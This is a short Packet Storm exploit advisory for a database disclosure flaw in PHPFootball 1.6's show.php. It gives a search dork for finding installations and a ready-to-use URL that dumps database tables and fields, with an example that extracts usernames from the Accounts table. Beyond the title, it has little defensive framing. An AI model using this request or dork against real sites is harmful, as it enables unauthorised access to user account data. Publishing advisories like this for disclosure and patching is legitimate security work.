PHPFootball version 1.6 suffers from a remote database disclosure flaw in show.php.
96487c2eea99217b0f2ffc08d5e59b1f*******************************************************************************
# Title : PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://phpfootball.sourceforge.net
# $$ : Free
# Dork : inurl:/phpfootball/
*******************************************************************************
[[DBREAD]]]---------------------------------------------------------
http://[target]/[path]//show.php [VARIABLES]
Example:
//show.php?dbtable=Accounts&dbfield=Username&dbfieldv=%&dbfields=Id&
[dbtable] :Database Table Name
[dbfield] :Field Name
[dbfields]:Listing(Order by x)
[[/DBREAD]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!